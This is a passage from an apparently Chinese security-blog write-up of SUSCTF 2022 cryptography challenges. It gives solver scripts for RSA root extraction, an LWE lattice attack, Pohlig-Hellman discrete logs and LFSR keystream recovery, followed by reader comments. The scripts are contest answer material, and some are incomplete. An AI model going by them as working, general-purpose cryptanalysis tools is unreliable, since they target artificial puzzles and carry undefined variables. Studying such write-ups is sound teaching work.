        c = 2832775557487418816663494645849097066925967799754895979829784499040437385450603537732862576495758207240632734290947928291961063611897822688909447511260639429367768479378599532712621774918733304857247099714044615691877995534173849302353620399896455615474093581673774297730056975663792651743809514320379189748228186812362112753688073161375690508818356712739795492736743994105438575736577194329751372142329306630950863097761601196849158280502041616545429586870751042908365507050717385205371671658706357669408813112610215766159761927196639404951251535622349916877296956767883165696947955379829079278948514755758174884809479690995427980775293393456403529481055942899970158049070109142310832516606657100119207595631431023336544432679282722485978175459551109374822024850128128796213791820270973849303929674648894135672365776376696816104314090776423931007123128977218361110636927878232444348690591774581974226318856099862175526133892
        c = (c * inverse(int(pow(2, 1032 * e, n)), n)) % (p * q)
        cp = c % p
        cq = c % q

        cp = pow(cp, inverse(e // GCD(e, p - 1), p - 1), p)
        cq = pow(cq, inverse(e // GCD(e, q - 1), q - 1), q)

        e1 = GCD(e, p - 1)
        e2 = GCD(e, q - 1)

        mp = AMM(cp, e1, p)
        mq = AMM(cq, e2, q)


        print(mp)

        p_proot = findAllPRoot(p, e1)
        q_proot = findAllPRoot(q, e2)

        mps = findAllSolutions(mp, p_proot, e1, cp, p)
        mqs = findAllSolutions(mq, q_proot, e2, cq, q)

        # print(mps, mqs)

        def check(m):
            h = m
            # print(long_to_bytes(h))
            if b'SUSCTF' in long_to_bytes(h):
                print(long_to_bytes(h))
                return True
            else:
                return False


        start = time.time()
        print('Start CRT...')
        for mpp in tqdm(mps):
            for mqq in mqs:
                solution = CRT_list([int(mpp), int(mqq)], [p, q])
                if check(solution):
                    print(solution)
        print(time.time() - start)

        end = time.time()
        print("Finished in {} seconds.".format(end - start))
    except AssertionError:
        continue

InverseProblem

直接LWE,低精度看成噪声

s = open(".\\89f6f4d1e3914ec39686faa928223ee0\\b.txt", 'r').read().split('\n')
s = [int(i[:-4].replace('.', '')) for i in s[:-1]]
A = gravity(len(s))
A = [[int(i*10**18) for i in Ai] for Ai in A]
M = block_matrix([Matrix(ZZ, A), identity_matrix(85)], ncols=2, subdivide=False)
M = block_matrix([M, Matrix(ZZ, s+[0]*85)], nrows=2, subdivide=False)
ML = M.LLL()
print(''.join([chr(i) for i in ML[0][85:]]))

SpecialCurve3

1

配方乘佩尔方程然后映射在$GF(p)$然后跑dlp

2

y模p是线性的

3

阶$p+1$,而且光滑直接ph

from functools import reduce
import requests
from gmpy2 import gcd, invert


def _bsgs(g: int, h: int, m: int, bound=None) -> int:
    d = int(pow(bound[1] - bound[0], 0.5)) + 1
    baby = {}
    baby_start = h
    gian_start = pow(g, bound[0], m)
    y_d = pow(g, d, m)
    inv = invert(g, m)
    for i in range(d):
        baby[baby_start] = i
        baby_start = (baby_start * inv) % m
    for i in range(d):
        if gian_start in baby:
            r, s = i, baby[gian_start]
            break
        gian_start = (gian_start * y_d) % m
    else:
        raise RuntimeError('no solution')
    return (r * d + s) + bound[0]


def ebsgs(g: int, h: int, m: int, bound=None) -> int:
    """
    gcd(g, m) != 1
    """
    if h == 1:
        return 0

    cnt, temp = 0, 1
    while True:
        d = gcd(g, m)
        if d == 1:
            break
        if h % d:
            raise Exception('no solution')
        h //= d
        m //= d
        temp = temp * (g // d) % m
        cnt += 1
        if temp == h:
            return cnt

    h = h * invert(d, m) % m
    return cnt + _bsgs(g, h, m, (max(bound[0] - cnt, 0), bound[1] - cnt))


def bsgs(g: int, h: int, m: int, bound=None) -> int:
    """
    g ^ x == h mod(m)
    :param g:
    :param h:
    :param m:
    :param bound: low bound <= x <= up bound
    :return: x
    """
    g %= m
    h %= m
    if h == 1:
        return 0
    d = gcd(g, m)
    if h % d:
        print(g, h, m)
        raise Exception('no solution')

    if bound is None:
        bound = (0, m)
    else:
        assert type(bound) == tuple

    if d != 1:
        return ebsgs(g, h, m, bound)
    else:
        return _bsgs(g, h, m, bound)


def get_factor(n_to_fac: int) -> list:
    response = requests.get(r'http://factordb.com/api', params={"query": str(n_to_fac)})
    facs = []
    for one in response.json().get("factors"):
        facs += [int(one[0])] * one[1]
    return facs


def crt(remainder_list, mod_list):
    mod_product = reduce(lambda a, b: a * b, mod_list)
    mi_list = [mod_product // _ for _ in mod_list]
    mi_inverse = [invert(mi_list[i], mod_list[i]) for i in range(len(mi_list))]
    r = 0
    for i in range(len(remainder_list)):
        r += mi_list[i] * mi_inverse[i] * remainder_list[i]
        r %= mod_product
    return r


def get_order(g: int, _p: int, factors: list) -> tuple([int, list]):
    order = _p - 1
    ord_factors = []
    for f in factors:
        if pow(g, order // f, _p) == 1:
            order //= f
        else:
            ord_factors.append(f)
    return order, [(i, ord_factors.count(i)) for i in set(ord_factors)]


def pohlig_hellman(g, h, p) -> int:
    factor_list = get_factor(p + 1)
    # print(factor_list)
    order, order_factor_list = get_order(g, p, factor_list)
    xs = []
    for factor_tuple in order_factor_list:
        _g = pow(g, order // factor_tuple[0], p)
        xs.append(0)
        for i in range(factor_tuple[1]):
            _h = h
            _h = (_h * invert(pow(g, xs[-1], p), p)) % p
            _h = pow(_h, order // (factor_tuple[0] ** (i + 1)), p)
            r = bsgs(_g, _h, p, (0, factor_tuple[0]))
            xs[-1] += r * (factor_tuple[0] ** i)
    return crt(xs, [one[0] ** one[1] for one in order_factor_list])


if __name__ == '__main__':
    curve = SpecialCurve(
        52373730653143623993722188411805072409768054271090317191163373082830382186155222057388907031638565243831629283127812681929449631957644692314271061305360051,
        28655236915186704327844312279364325861102737672471191366040478446302230316126579253163690638394777612892597409996413924040027276002261574013341150279408716,
        42416029226399083779760024372262489355327595236815424404537477696856946194575702884812426801334149232783155054432357826688204061261064100317825443760789993)
    G = (
        15928930551986151950313548861530582114536854007449249930339281771205424453985946290830967245733880747219865184207937142979512907006835750179101295088805979,
        29726385672383966862722624018664799344530038744596171136235079529609085682764414035677068447708040589338778102975312549905710028842378574272316925268724240)
    Q = (
        38121552296651560305666865284721153617113944344833289618523344614838728589487183141203437711082603199613749216407692351802119887009907921660398772094998382,
        26933444836972639216676645467487306576059428042654421228626400416790420281717654664520663525738892984862698457685902674487454159311739553538883303065780163)

    ans = pohlig_hellman(G, Q, p)
    print('answer:', ans)

Ez_Pager_Tiper

题目加密手段的confusion函数形同虚设,在Problem1中confusion函数直接返回第二个参数,Problem2中返回两参数的异或,有了这个规律,就能通过消息开头的明文Date: xxxx-xx-xx形式以及文件名解码,得到消息1加密的mask1,在消息2中通过爆破初始seed2的方式,推测seed1和mask1,根据解密的消息来判断爆破终点。
解密1的脚本与解密2中重复,当时是在shell做的,不再提供。下面给出第二步exp

from magic_box import lfsr
from tqdm import tqdm
from Crypto.Util.number import *

f = open("MTk4NC0xMi0yNQ==_76ff.enc", 'rb')
data = f.read()
f.close()

out1 = b'\\\x9e\xd1R\x9c\x15\x139\xc5\x1b\xa07\xd5W\x96\xd3'       # Xor of "Date: xxxx-xx-xx and cipher"
out1 = bytes_to_long(out1)
out1 = bin(out1)[2:].zfill(128)

for i in tqdm(range(2^12)):
    l2 = lfsr(i, 2053, 12)
    d2 = Integer(i).digits(2, padto=12)[::-1]
    print("generating...")
    while len(d2) < 128:
        d2.append(l2.next())
    l1 = []
    for j in range(128):
        l1.append(d2[j] ^ int(out1[j]))
    A = []
    for j in range(64):
        A.append(l1[j:j+64])
    A = Matrix(Zmod(2), A)
    y = l1[64:128]
    y = vector(Zmod(2), y)
    print("solving...")
    try:
        mask1 = A.solve_right(y)
    except KeyboardInterrupt:
        raise KeyboardInterrupt
    except:
        continue
    print("calculating...")
    mask1 = int(''.join([str(each) for each in mask1]), 2)
    l1 = lfsr(int(''.join([str(each) for each in l1[64:128]]), 2), mask1, 64)
    s = ''
    try:
        for each in data[16:64]:
            this = each ^ (l1.getrandbit(8) ^ l2.getrandbit(8))
            s += long_to_bytes(this).decode()
        print(s)
        break
    except KeyboardInterrupt:
        raise KeyboardInterrupt
    except:
        continue

评论

A

ARCHER359 2022-03-01 12:49:55

师傅太强了

L

LLeaves 2022-03-02 19:15:45

师傅tql

Retr_0

Noooooooooooob

twitter weibo github wechat

随机分类

业务安全 文章:29 篇
安全管理 文章:7 篇
二进制安全 文章:77 篇
Java安全 文章:34 篇
运维安全 文章:62 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Yukong

🐮皮

H

HHHeey

好的,谢谢师傅的解答

Article_kelp

a类中的变量secret_class_var = "secret"是在merge

H

HHHeey

secret_var = 1 def test(): pass

H

hgsmonkey

tql!!!

目录